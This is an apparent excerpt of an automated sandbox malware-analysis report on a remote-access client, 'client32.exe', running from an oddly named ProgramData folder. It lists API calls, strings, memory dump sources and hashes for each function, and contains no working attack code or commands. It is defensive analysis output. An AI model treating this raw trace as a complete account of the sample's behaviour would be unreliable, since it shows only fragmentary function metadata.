                                                                                                                                                                                  • Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(00000000,?,11144A43,?), ref: 111447FC
                                                                                                                                                                                  • Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\4dvs23l\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E25
                                                                                                                                                                                • ResetEvent.KERNEL32(00000268), ref: 11144E39
                                                                                                                                                                                • SetEvent.KERNEL32(00000268), ref: 11144E4F
                                                                                                                                                                                • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E5E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                                                                                                • String ID: MiniDump
                                                                                                                                                                                • API String ID: 1494854734-2840755058
                                                                                                                                                                                • Opcode ID: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                                                                                                                                • Instruction ID: ea994b22643fb5a56552c53957c3f10a02c9a0f0123a866c2d557df6367c4d32
                                                                                                                                                                                • Opcode Fuzzy Hash: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                                                                                                                                • Instruction Fuzzy Hash: 1F112975A8412577E710DBA8DC81F9BF768AB04B28F200230E634E7AC4EB74A50587A1
                                                                                                                                                                                Function 6C608E28 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 6C605000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C605014
                                                                                                                                                                                  • Part of subcall function 6C605000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C608E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C605034
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6C608EAE
                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 6C608EBF
                                                                                                                                                                                  • Part of subcall function 6C602420: _strrchr.LIBCMT ref: 6C60242E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3007256676.000000006C601000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3007234393.000000006C600000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007315728.000000006C640000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007336466.000000006C649000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007374860.000000006C64E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3007443449.000000006C650000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_6c600000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
                                                                                                                                                                                • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                                                                                                                                • API String ID: 3215810784-3459472706
                                                                                                                                                                                • Opcode ID: c5d8e4fb26b1d1877f08e1baa78872456fb1410eeeaa20ca40a03a21217c3e18
                                                                                                                                                                                • Instruction ID: 4d8641c957c5250dff5dfe9fb26250a4249094628625f1492129b648d2afcd4e
                                                                                                                                                                                • Opcode Fuzzy Hash: c5d8e4fb26b1d1877f08e1baa78872456fb1410eeeaa20ca40a03a21217c3e18
                                                                                                                                                                                • Instruction Fuzzy Hash: CA11E671B002149BEB18DA51DE45BEA7374EF4A309F008456EE09F7A50EB30AA49CB6D
                                                                                                                                                                                Function 111479B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 111479DF
                                                                                                                                                                                • wsprintfA.USER32 ref: 11147A16
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                                                                                                • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                                                                                                • API String ID: 1985783259-2296142801
                                                                                                                                                                                • Opcode ID: a11b40740390c7cc7e6b3a3d63c845e51148a2f493bbc800b34bae2ed5d7f6ec
                                                                                                                                                                                • Instruction ID: f4f04ea69c0c381d0959b313e9907706ba85fe26c30e15a9a088fcfc7c116df7
                                                                                                                                                                                • Opcode Fuzzy Hash: a11b40740390c7cc7e6b3a3d63c845e51148a2f493bbc800b34bae2ed5d7f6ec
                                                                                                                                                                                • Instruction Fuzzy Hash: 6811E5FAE00218A7D710DEA49D81FEAF36C9B44608F100165FB08F6141EB70AA05CBE4
                                                                                                                                                                                Function 111466B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
                                                                                                                                                                                  • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                                                                                                                  • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                                                                                                                                • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030D50,00000002), ref: 111466CF
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 111466E1
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,11030D50,00000002), ref: 111466F4
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$AddressFreeLoadOpenProcVersion_strncpy
                                                                                                                                                                                • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                                                                                                                • API String ID: 1216909955-1959555903
                                                                                                                                                                                • Opcode ID: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
                                                                                                                                                                                • Instruction ID: b4913e853cd1401fb26aad2e9137c069c6cdc321efb83b495f2c8eb55c4c44ed
                                                                                                                                                                                • Opcode Fuzzy Hash: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
                                                                                                                                                                                • Instruction Fuzzy Hash: CDF0A03A781225A3E51912AABD58B9ABB5C9BC1A7EF150230F929D6DC0DB50C50082B5
                                                                                                                                                                                Function 11031F30 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • wsprintfA.USER32 ref: 11031FE6
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                                                                                                • String ID: %s%s.bin$301389$clientinv.cpp$m_pDoInv == NULL
                                                                                                                                                                                • API String ID: 4180936305-2736919879
                                                                                                                                                                                • Opcode ID: 592f632ef08f00a7fb3c9c418e966523ea8c5281cdfdeec61c84b610c628646f
                                                                                                                                                                                • Instruction ID: 4b30c984cb9feb044c1d7ab8c0844ab34c920fbc261825ed793c706054f3ad77
                                                                                                                                                                                • Opcode Fuzzy Hash: 592f632ef08f00a7fb3c9c418e966523ea8c5281cdfdeec61c84b610c628646f
                                                                                                                                                                                • Instruction Fuzzy Hash: D82190B5F00705AFD710CF65CC41BAAB7F4EB88758F10853DE86697681EB35A8008B51
                                                                                                                                                                                Function 11145240 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
                                                                                                                                                                                • __strdup.LIBCMT ref: 11145277
                                                                                                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                                                                  • Part of subcall function 11145240: _free.LIBCMT ref: 1114529E
                                                                                                                                                                                • _free.LIBCMT ref: 111452AC
                                                                                                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                                                                • CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 398584587-0
                                                                                                                                                                                • Opcode ID: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                                                                                                                                • Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
                                                                                                                                                                                • Opcode Fuzzy Hash: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                                                                                                                                • Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2
                                                                                                                                                                                Function 1100EE20 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52
                                                                                                                                                                                  • Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC
                                                                                                                                                                                • _free.LIBCMT ref: 1100EE64
                                                                                                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                                                                                • _free.LIBCMT ref: 1100EE77
                                                                                                                                                                                • _free.LIBCMT ref: 1100EE8A
                                                                                                                                                                                • _free.LIBCMT ref: 1100EE9D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3515823920-0
                                                                                                                                                                                • Opcode ID: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                                                                                                                • Instruction ID: a44a88996e3d62c283fa82fd04d5e1258298656dbf2da44853d36c331dab430a
                                                                                                                                                                                • Opcode Fuzzy Hash: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                                                                                                                                • Instruction Fuzzy Hash: 9511B2F2D046559BE720CF99D800A5BFBECEB50764F144A2AE49AD3640E7B2F904CA51
                                                                                                                                                                                Function 111464E0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 1114580D
                                                                                                                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,11110200), ref: 1114584E
                                                                                                                                                                                  • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                                                                                • wsprintfA.USER32 ref: 1114650E
                                                                                                                                                                                • wsprintfA.USER32 ref: 11146524
                                                                                                                                                                                  • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,11110200,75BF8400,?), ref: 11143E97
                                                                                                                                                                                  • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                                                                                                                  • Part of subcall function 11143E00: CloseHandle.KERNEL32(00000000), ref: 11143EBF
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                                                                                                                • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                                                                                                                • API String ID: 3779116287-2600120591
                                                                                                                                                                                • Opcode ID: a0ed96d366f73f1fee5948055f0553608574c1c8edb1393faceee91aacbe9145
                                                                                                                                                                                • Instruction ID: d6aa3785d543843f1191885663c1f1b2da884e9fda22ce0040deef08ed208be3
                                                                                                                                                                                • Opcode Fuzzy Hash: a0ed96d366f73f1fee5948055f0553608574c1c8edb1393faceee91aacbe9145
                                                                                                                                                                                • Instruction Fuzzy Hash: 7B01B5BA90122DA6CB10DBB09D41FDEF77CCB1460DF5005A5E8099A540EE60BE44DBD1
                                                                                                                                                                                Function 110F4B70 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 110F4B8A
                                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F4BAA
                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 110F4BC4
                                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 110F4BCA
                                                                                                                                                                                • CoUninitialize.OLE32 ref: 110F4BE6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
